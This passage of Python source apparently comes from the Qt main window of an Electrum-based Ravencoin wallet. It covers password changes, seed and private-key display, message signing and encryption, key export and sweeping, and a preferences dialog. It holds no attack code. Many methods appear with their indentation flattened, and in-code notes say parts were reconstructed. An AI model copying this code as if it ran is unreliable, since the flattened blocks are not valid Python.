        run_hook('create_status_bar', sb)
        self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
    def update_buttons_on_seed(self):
        """Sync seed/password/send button visibility with wallet capabilities."""
        self.seed_button.setVisible(self.wallet.has_seed())
        self.password_button.setVisible(self.wallet.may_have_password())
        # watching-only wallets cannot sign, so hide the Send button
        self.send_button.setVisible(not self.wallet.is_watching_only())
    def change_password_dialog(self):
        """Change (or disable) the wallet password.

        Hardware wallets with xpub-password storage derive the storage
        encryption password from the device; software wallets prompt for old
        and new passwords directly.
        """
        from electrum.storage import STO_EV_XPUB_PW
        if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
            # Hardware-wallet path: only the encrypt-file choice is asked;
            # the effective password comes from the device.
            from .password_dialog import ChangePasswordDialogForHW
            d = ChangePasswordDialogForHW(self, self.wallet)
            ok, encrypt_file = d.run()
            if not ok:
                return

            try:
                hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
            except UserCancelled:
                return
            except BaseException as e:
                traceback.print_exc(file=sys.stderr)
                self.show_error(str(e))
                return
            old_password = hw_dev_pw if self.wallet.has_password() else None
            new_password = hw_dev_pw if encrypt_file else None
        else:
            # Software-wallet path: user supplies old and new passwords.
            from .password_dialog import ChangePasswordDialogForSW
            d = ChangePasswordDialogForSW(self, self.wallet)
            ok, old_password, new_password, encrypt_file = d.run()

        if not ok:
            return
        try:
            self.wallet.update_password(old_password, new_password, encrypt_file)
        except InvalidPassword as e:
            self.show_error(str(e))
            return
        except BaseException:
            traceback.print_exc(file=sys.stdout)
            self.show_error(_('Failed to update password'))
            return
        msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
        self.show_message(msg, title=_("Success"))
        self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
    def show_master_public_keys(self):
        """Show a dialog with wallet metadata and its master public key(s)."""
        dialog = WindowModalDialog(self, _("Wallet Information"))
        dialog.setMinimumSize(500, 100)
        mpk_list = self.wallet.get_master_public_keys()
        vbox = QVBoxLayout()
        wallet_type = self.wallet.storage.get('wallet_type', '')
        if self.wallet.is_watching_only():
            wallet_type += ' [{}]'.format(_('watching-only'))
        seed_available = _('True') if self.wallet.has_seed() else _('False')
        keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
        grid = QGridLayout()
        basename = os.path.basename(self.wallet.storage.path)
        grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
        grid.addWidget(QLabel(basename), 0, 1)
        grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
        grid.addWidget(QLabel(wallet_type), 1, 1)
        grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
        grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
        grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
        grid.addWidget(QLabel(str(seed_available)), 3, 1)
        if len(keystore_types) <= 1:
            grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
            ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
            grid.addWidget(QLabel(ks_type), 4, 1)
        vbox.addLayout(grid)
        if self.wallet.is_deterministic():
            mpk_text = ShowQRTextEdit()
            mpk_text.setMaximumHeight(150)
            mpk_text.addCopyButton(self.app)
            def show_mpk(index):
                # swap the displayed key when the user picks another cosigner
                mpk_text.setText(mpk_list[index])
            # only show the combobox in case multiple accounts are available
            if len(mpk_list) > 1:
                def label(key):
                    if isinstance(self.wallet, Multisig_Wallet):
                        return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
                    return ''
                labels = [label(i) for i in range(len(mpk_list))]
                on_click = lambda clayout: show_mpk(clayout.selected_index())
                labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
                vbox.addLayout(labels_clayout.layout())
            else:
                vbox.addWidget(QLabel(_("Master Public Key")))
            show_mpk(0)
            vbox.addWidget(mpk_text)
        vbox.addStretch(1)
        vbox.addLayout(Buttons(CloseButton(dialog)))
        dialog.setLayout(vbox)
        dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
    @protected
    def _delete_wallet(self, password):
        """Stop the wallet in the daemon, close this window, delete the file.

        The password argument is injected by @protected.
        """
        wallet_path = self.wallet.storage.path
        basename = os.path.basename(wallet_path)
        # Stop the daemon's handle on the file before unlinking it.
        self.gui_object.daemon.stop_wallet(wallet_path)
        self.close()
        os.unlink(wallet_path)
        self.show_error(_("Wallet removed: {}").format(basename))
    @protected
    def show_seed_dialog(self, password):
        """Show the wallet seed and passphrase after password confirmation
        (password injected by @protected)."""
        if not self.wallet.has_seed():
            self.show_message(_('This wallet has no seed'))
            return
        keystore = self.wallet.get_keystore()
        try:
            seed = keystore.get_seed(password)
            passphrase = keystore.get_passphrase(password)
        except BaseException as e:
            self.show_error(str(e))
            return
        from .seed_dialog import SeedDialog
        d = SeedDialog(self, seed, passphrase)
        d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
    @protected
    def show_private_key(self, address, password):
        """Show the private key (and redeem script, if any) for *address*
        after password confirmation (password injected by @protected)."""
        if not address:
            return
        try:
            pk, redeem_script = self.wallet.export_private_key(address, password)
        except Exception as e:
            traceback.print_exc(file=sys.stdout)
            self.show_message(str(e))
            return
        # script type is encoded in the WIF-serialized key
        xtype = bitcoin.deserialize_privkey(pk)[0]
        d = WindowModalDialog(self, _("Private key"))
        d.setMinimumSize(600, 150)
        vbox = QVBoxLayout()
        vbox.addWidget(QLabel(_("Address") + ': ' + address))
        vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
        vbox.addWidget(QLabel(_("Private key") + ':'))
        keys_e = ShowQRTextEdit(text=pk)
        keys_e.addCopyButton(self.app)
        vbox.addWidget(keys_e)
        if redeem_script:
            vbox.addWidget(QLabel(_("Redeem Script") + ':'))
            rds_e = ShowQRTextEdit(text=redeem_script)
            rds_e.addCopyButton(self.app)
            vbox.addWidget(rds_e)
        vbox.addLayout(Buttons(CloseButton(d)))
        d.setLayout(vbox)
        d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
    @protected
    def do_sign(self, address, message, signature, password):
        """Sign the message widget's text with *address* and put the base64
        signature into the signature widget (password via @protected).

        The widget arguments are Qt input widgets, not plain strings.
        """
        address  = address.text().strip()
        message = message.toPlainText().strip()
        if not bitcoin.is_address(address):
            self.show_message(_('Invalid Bitcoin address.'))
            return
        if self.wallet.is_watching_only():
            self.show_message(_('This is a watching-only wallet.'))
            return
        if not self.wallet.is_mine(address):
            self.show_message(_('Address not in wallet.'))
            return
        txin_type = self.wallet.get_txin_type(address)
        # only address types with a unique pubkey can sign messages
        if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
            self.show_message(_('Cannot sign messages with this type of address:') + \
                              ' ' + txin_type + '\n\n' + self.msg_sign)
            return
        task = partial(self.wallet.sign_message, address, message, password)

        def show_signed_message(sig):
            try:
                signature.setText(base64.b64encode(sig).decode('ascii'))
            except RuntimeError:
                # (signature) wrapped C/C++ object has been deleted
                pass
        self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
    @protected
    def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
        """Decrypt the ciphertext widget's text with the wallet key for the
        given pubkey, off the GUI thread (password via @protected)."""
        if self.wallet.is_watching_only():
            self.show_message(_('This is a watching-only wallet.'))
            return
        cyphertext = encrypted_e.toPlainText()
        task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)

        def setText(text):
            try:
                message_e.setText(text.decode('utf-8'))
            except RuntimeError:
                # (message_e) wrapped C/C++ object has been deleted
                pass
        self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
    def read_tx_from_qrcode(self):
        """Scan a QR code and handle it as either a payment URI or a raw tx."""
        from electrum import qrscanner
        try:
            data = qrscanner.scan_barcode(self.config.get_video_device())
        except BaseException as e:
            self.show_error(str(e))
            return
        if not data:
            return
        # if the user scanned a payment URI (this fork uses the
        # "ravencoin:" scheme)
        if str(data).startswith("ravencoin:"):
            self.pay_to_URI(data)
            return
        # else if the user scanned an offline signed tx
        try:
            # QR codes carry the tx in base43; decode back to hex
            data = bh2u(bitcoin.base_decode(data, length=None, base=43))
        except BaseException as e:
            self.show_error((_('Could not decode QR code')+':\n{}').format(e))
            return
        tx = self.tx_from_text(data)
        if not tx:
            return
        self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
    def do_process_from_file(self):
        """Load a transaction from a file on disk and, if parsed, show it."""
        tx = self.read_tx_from_file()
        if tx:
            self.show_transaction(tx)
    def do_process_from_txid(self):
        """Fetch a transaction by txid from the network and show it."""
        from electrum import transaction
        txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
        if ok and txid:
            txid = str(txid).strip()
            try:
                # blocking fetch via the network thread, with a timeout
                raw_tx = self.network.run_from_another_thread(
                    self.network.get_transaction(txid, timeout=10))
            except Exception as e:
                self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
                return
            tx = transaction.Transaction(raw_tx)
            self.show_transaction(tx)
    @protected
    def export_privkeys_dialog(self, password):
        """Dialog that exports all wallet private keys to a CSV or JSON file.

        Keys are derived on a background thread (one per address, with
        progress updates over Qt signals); the export button is enabled only
        once derivation has finished. Password is injected by @protected.
        """
        if self.wallet.is_watching_only():
            self.show_message(_("This is a watching-only wallet"))
            return

        if isinstance(self.wallet, Multisig_Wallet):
            self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
                              _('It cannot be "backed up" by simply exporting these private keys.'))

        d = WindowModalDialog(self, _('Private keys'))
        d.setMinimumSize(980, 300)
        vbox = QVBoxLayout(d)

        msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
                              _("Exposing a single private key can compromise your entire wallet!"),
                              _("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
        vbox.addWidget(QLabel(msg))

        e = QTextEdit()
        e.setReadOnly(True)
        vbox.addWidget(e)

        defaultname = 'electrum-rvn-private-keys.csv'
        select_msg = _('Select file to export your private keys to')
        hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
        vbox.addLayout(hbox)

        b = OkButton(d, _('Export'))
        b.setEnabled(False)
        vbox.addLayout(Buttons(CancelButton(d), b))

        private_keys = {}
        addresses = self.wallet.get_addresses()
        done = False
        cancelled = False
        def privkeys_thread():
            # worker thread: derive one key at a time, emitting progress
            for addr in addresses:
                time.sleep(0.1)
                if done or cancelled:
                    break
                privkey = self.wallet.export_private_key(addr, password)[0]
                private_keys[addr] = privkey
                self.computing_privkeys_signal.emit()
            if not cancelled:
                self.computing_privkeys_signal.disconnect()
                self.show_privkeys_signal.emit()

        def show_privkeys():
            # GUI thread: display the full result and enable Export
            s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
            e.setText(s)
            b.setEnabled(True)
            self.show_privkeys_signal.disconnect()
            nonlocal done
            done = True

        def on_dialog_closed(*args):
            # stop the worker and detach signals if the user closes early
            nonlocal done
            nonlocal cancelled
            if not done:
                cancelled = True
                self.computing_privkeys_signal.disconnect()
                self.show_privkeys_signal.disconnect()

        self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
        self.show_privkeys_signal.connect(show_privkeys)
        d.finished.connect(on_dialog_closed)
        threading.Thread(target=privkeys_thread).start()

        if not d.exec_():
            done = True
            return

        filename = filename_e.text()
        if not filename:
            return

        try:
            self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
        except (IOError, os.error) as reason:
            txt = "\n".join([
                _("Electrum was unable to produce a private key-export."),
                str(reason)
            ])
            self.show_critical(txt, title=_("Unable to create csv"))
        except Exception as e:
            self.show_message(str(e))
            return

        self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
    """Write address -> private-key pairs to *fileName*.

    fileName: destination path (overwritten if it exists).
    pklist:   mapping of address -> WIF private key.
    is_csv:   True for a two-column CSV ("address", "private_key");
              False for a JSON object dump.

    Raises IOError/OSError on filesystem problems (handled by the caller).
    """
    # Fixes vs. the previous version:
    #  * the local csv.writer was named `transaction`, shadowing the
    #    `transaction` module used elsewhere in this file — renamed.
    #  * csv files must be opened with newline='' (csv module docs);
    #    otherwise extra blank rows appear on Windows.
    #  * "w+" read/write mode was unnecessary for a pure export — use "w".
    with open(fileName, "w", newline='') as f:
        if is_csv:
            csv_writer = csv.writer(f)
            csv_writer.writerow(["address", "private_key"])
            for addr, pk in pklist.items():
                # right-justify addresses to 34 chars, as before
                csv_writer.writerow(["%34s" % addr, pk])
        else:
            f.write(json.dumps(pklist, indent=4))
def do_import_labels(self):
    """Let the user pick a label file and merge its entries into the wallet."""
    def _load(path):
        def _passthrough_validate(data):
            return data  # TODO
        def _apply(data):
            for txid_or_addr, label in data.items():
                self.wallet.set_label(txid_or_addr, label)
        import_meta(path, _passthrough_validate, _apply)
    def _refresh():
        # schedule a GUI refresh so the new labels become visible
        self.need_update.set()
    import_meta_gui(self, _('labels'), _load, _refresh)
def do_export_labels(self):
    """Prompt for a destination file and save the wallet's labels to it."""
    export_meta_gui(self, _('labels'),
                    lambda filename: export_meta(self.wallet.labels, filename))
def sweep_key_dialog(self):
    """Dialog that sweeps coins controlled by externally supplied private keys
    into one of this wallet's own addresses (preferring unused ones)."""
    d = WindowModalDialog(self, title=_('Sweep private keys'))
    d.setMinimumSize(600, 300)
    vbox = QVBoxLayout(d)
    hbox_top = QHBoxLayout()
    hbox_top.addWidget(QLabel(_("Enter private keys:")))
    hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
    vbox.addLayout(hbox_top)
    keys_e = ScanQRTextEdit(allow_multi=True)
    keys_e.setTabChangesFocus(True)
    vbox.addWidget(keys_e)
    # destination candidates: unused first, then fall back for wallet types
    # that don't implement get_receiving_addresses()
    addresses = self.wallet.get_unused_addresses()
    if not addresses:
        try:
            addresses = self.wallet.get_receiving_addresses()
        except AttributeError:
            addresses = self.wallet.get_addresses()
    h, address_e = address_field(addresses)
    vbox.addLayout(h)
    vbox.addStretch(1)
    button = OkButton(d, _('Sweep'))
    vbox.addLayout(Buttons(CancelButton(d), button))
    button.setEnabled(False)  # enabled only when both inputs validate
    def get_address():
        # destination address, or None if the field doesn't parse
        addr = str(address_e.text()).strip()
        if bitcoin.is_address(addr):
            return addr
    def get_pk():
        # parsed private keys from the text box, or None
        text = str(keys_e.toPlainText())
        return keystore.get_private_keys(text)
    f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
    on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
    keys_e.textChanged.connect(f)
    address_e.textChanged.connect(f)
    address_e.textChanged.connect(on_address)
    if not d.exec_():
        return
    from electrum.wallet import sweep_preparations
    try:
        self.do_clear()
        if get_pk() is not None:
            # stage a max-value send in the Send tab, frozen so the user
            # can only review/broadcast it
            coins, keypairs = sweep_preparations(get_pk(), self.network)
            self.tx_external_keypairs = keypairs
            self.spend_coins(coins)
            self.payto_e.setText(get_address())
            self.spend_max()
            self.payto_e.setFrozen(True)
            self.amount_e.setFrozen(True)
    except Exception as e:  # FIXME too broad...
        self.show_message(str(e))
        return
    self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
    """Generic import flow: prompt for whitespace-separated entries, feed them
    to *func* (which returns (good_inputs, bad_inputs)), then report results
    and refresh the address/history views."""
    text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
    if not text:
        return
    good_inputs, bad_inputs = func(str(text).split())
    if good_inputs:
        summary = '\n'.join(good_inputs[:10])
        if len(good_inputs) > 10:
            summary += '\n...'
        self.show_message(_("The following addresses were added")
                          + f' ({len(good_inputs)}):\n' + summary)
    if bad_inputs:
        summary = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
        if len(bad_inputs) > 10:
            summary += '\n...'
        self.show_error(_("The following inputs could not be imported")
                        + f' ({len(bad_inputs)}):\n' + summary)
    self.address_list.update()
    self.history_list.update()
def import_addresses(self):
    """Prompt for watch-only addresses and add them to an importable wallet."""
    if not self.wallet.can_import_address():
        return
    self._do_import(_('Import addresses'), _("Enter addresses") + ':',
                    self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
    """Prompt for WIF private keys and import them into the wallet.

    `password` is supplied by the @protected decorator (presumably after
    prompting the user — confirm against the decorator's definition).
    """
    if not self.wallet.can_import_privkey():
        return
    title = _('Import private keys')
    header_layout = QHBoxLayout()
    header_layout.addWidget(QLabel(_("Enter private keys")+':'))
    header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
    self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
    """Refresh fiat-related widgets after exchange-rate settings change."""
    # NB: kept as a truthy value (may be None if self.fx is unset), exactly
    # as the callers expect
    b = self.fx and self.fx.is_enabled()
    self.fiat_send_e.setVisible(b)
    self.fiat_receive_e.setVisible(b)
    for view in (self.history_list, self.address_list):
        view.refresh_headers()
        view.update()
    self.update_status()
def settings_dialog(self):
    """Modal Preferences dialog.

    Builds the Fees / Transactions / Appearance / Fiat / Identity tabs; every
    control applies its setting immediately via a closure.  Settings that only
    take effect after a restart set self.need_restart, which triggers a
    warning when the dialog closes.
    """
    self.need_restart = False
    d = WindowModalDialog(self, _('Preferences'))
    vbox = QVBoxLayout()
    tabs = QTabWidget()
    gui_widgets = []
    fee_widgets = []
    tx_widgets = []
    id_widgets = []
    # language
    lang_help = _('Select which language is used in the GUI (after restart).')
    lang_label = HelpLabel(_('Language') + ':', lang_help)
    lang_combo = QComboBox()
    from electrum.i18n import languages
    lang_combo.addItems(list(languages.values()))
    lang_keys = list(languages.keys())
    lang_cur_setting = self.config.get("language", '')
    try:
        index = lang_keys.index(lang_cur_setting)
    except ValueError:  # not in list
        index = 0
    lang_combo.setCurrentIndex(index)
    if not self.config.is_modifiable('language'):
        for w in [lang_combo, lang_label]: w.setEnabled(False)
    def on_lang(x):
        lang_request = list(languages.keys())[lang_combo.currentIndex()]
        if lang_request != self.config.get('language'):
            self.config.set_key("language", lang_request, True)
            self.need_restart = True
    lang_combo.currentIndexChanged.connect(on_lang)
    gui_widgets.append((lang_label, lang_combo))
    # number of zeros shown after the decimal point
    nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
    nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
    nz = QSpinBox()
    nz.setMinimum(0)
    nz.setMaximum(self.decimal_point)
    nz.setValue(self.num_zeros)
    if not self.config.is_modifiable('num_zeros'):
        for w in [nz, nz_label]: w.setEnabled(False)
    def on_nz():
        value = nz.value()
        if self.num_zeros != value:
            self.num_zeros = value
            self.config.set_key('num_zeros', value, True)
            self.history_list.update()
            self.address_list.update()
    nz.valueChanged.connect(on_nz)
    gui_widgets.append((nz_label, nz))
    # fee estimation method
    msg = '\n'.join([
        _('Time based: fee rate is based on average confirmation time estimates'),
        _('Mempool based: fee rate is targeting a depth in the memory pool')
    ]
    )
    fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
    fee_type_combo = QComboBox()
    fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
    fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
    def on_fee_type(x):
        self.config.set_key('mempool_fees', x==2)
        self.config.set_key('dynamic_fees', x>0)
        self.fee_slider.update()
    fee_type_combo.currentIndexChanged.connect(on_fee_type)
    fee_widgets.append((fee_type_label, fee_type_combo))
    feebox_cb = QCheckBox(_('Edit fees manually'))
    feebox_cb.setChecked(self.config.get('show_fee', False))
    feebox_cb.setToolTip(_("Show fee edit box in send tab."))
    def on_feebox(x):
        self.config.set_key('show_fee', x == Qt.Checked)
        self.fee_adv_controls.setVisible(bool(x))
    feebox_cb.stateChanged.connect(on_feebox)
    fee_widgets.append((feebox_cb, None))
    # RBF checkbox exists but is never added to the layout (see the
    # commented-out append below) — RBF is disabled in this fork.
    use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
    use_rbf_cb.setChecked(self.config.get('use_rbf', True))
    use_rbf_cb.setToolTip(
        _('If you check this box, your transactions will be marked as non-final,') + '\n' + \
        _('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
        _('Note that some merchants do not accept non-final transactions until they are confirmed.'))
    def on_use_rbf(x):
        self.config.set_key('use_rbf', x == Qt.Checked)
    # rbf disable
    # NOTE(review): placement reconstructed from a flattened source — this
    # force-disable appears to run at dialog-build time; confirm indentation
    # against the original file.
    if self.config.get('use_rbf', True):
        self.config.set_key('use_rbf', False)
    use_rbf_cb.stateChanged.connect(on_use_rbf)
    #fee_widgets.append((use_rbf_cb, None))
    # OpenAlias identity
    msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
          + _('The following alias providers are available:') + '\n'\
          + '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
          + 'For more information, see https://openalias.org'
    alias_label = HelpLabel(_('OpenAlias') + ':', msg)
    alias = self.config.get('alias','')
    alias_e = QLineEdit(alias)
    def set_alias_color():
        # green = resolved and validated, red = lookup failed/unvalidated
        if not self.config.get('alias'):
            alias_e.setStyleSheet("")
            return
        if self.alias_info:
            alias_addr, alias_name, validated = self.alias_info
            alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
        else:
            alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
    def on_alias_edit():
        alias_e.setStyleSheet("")
        alias = str(alias_e.text())
        self.config.set_key('alias', alias, True)
        if alias:
            self.fetch_alias()
        set_alias_color()
    self.alias_received_signal.connect(set_alias_color)
    alias_e.editingFinished.connect(on_alias_edit)
    id_widgets.append((alias_label, alias_e))
    # SSL certificate
    msg = ' '.join([
        _('SSL certificate used to sign payment requests.'),
        _('Use setconfig to set ssl_chain and ssl_privkey.'),
    ])
    if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
        try:
            SSL_identity = paymentrequest.check_ssl_config(self.config)
            SSL_error = None
        except BaseException as e:
            SSL_identity = "error"
            SSL_error = str(e)
    else:
        SSL_identity = ""
        SSL_error = None
    SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
    SSL_id_e = QLineEdit(SSL_identity)
    SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
    if SSL_error:
        SSL_id_e.setToolTip(SSL_error)
    SSL_id_e.setReadOnly(True)
    id_widgets.append((SSL_id_label, SSL_id_e))
    # base unit
    units = base_units_list
    msg = (_('Base unit of your wallet.')
           + '\n1 RVN = 1000 mRVN. 1 mRVN = 1000 bits. 1 bit = 100 sat.\n'
           + _('This setting affects the Send tab, and all balance related fields.'))
    unit_label = HelpLabel(_('Base unit') + ':', msg)
    unit_combo = QComboBox()
    unit_combo.addItems(units)
    unit_combo.setCurrentIndex(units.index(self.base_unit()))
    def on_unit(x, nz):
        unit_result = units[unit_combo.currentIndex()]
        if self.base_unit() == unit_result:
            return
        # preserve the amounts entered in the edit fields across the change
        edits = self.amount_e, self.fee_e, self.receive_amount_e
        amounts = [edit.get_amount() for edit in edits]
        self.decimal_point = base_unit_name_to_decimal_point(unit_result)
        self.config.set_key('decimal_point', self.decimal_point, True)
        nz.setMaximum(self.decimal_point)
        self.history_list.update()
        self.request_list.update()
        self.address_list.update()
        for edit, amount in zip(edits, amounts):
            edit.setAmount(amount)
        self.update_status()
    unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
    gui_widgets.append((unit_label, unit_combo))
    # block explorer
    block_explorers = sorted(util.block_explorer_info().keys())
    msg = _('Choose which online block explorer to use for functions that open a web browser')
    block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
    block_ex_combo = QComboBox()
    block_ex_combo.addItems(block_explorers)
    block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
    def on_be(x):
        be_result = block_explorers[block_ex_combo.currentIndex()]
        self.config.set_key('block_explorer', be_result, True)
    block_ex_combo.currentIndexChanged.connect(on_be)
    gui_widgets.append((block_ex_label, block_ex_combo))
    # QR-scanner video device
    from electrum import qrscanner
    system_cameras = qrscanner._find_system_cameras()
    qr_combo = QComboBox()
    qr_combo.addItem("Default","default")
    for camera, device in system_cameras.items():
        qr_combo.addItem(camera, device)
    #combo.addItem("Manually specify a device", config.get("video_device"))
    index = qr_combo.findData(self.config.get("video_device"))
    qr_combo.setCurrentIndex(index)
    msg = _("Install the zbar package to enable this.")
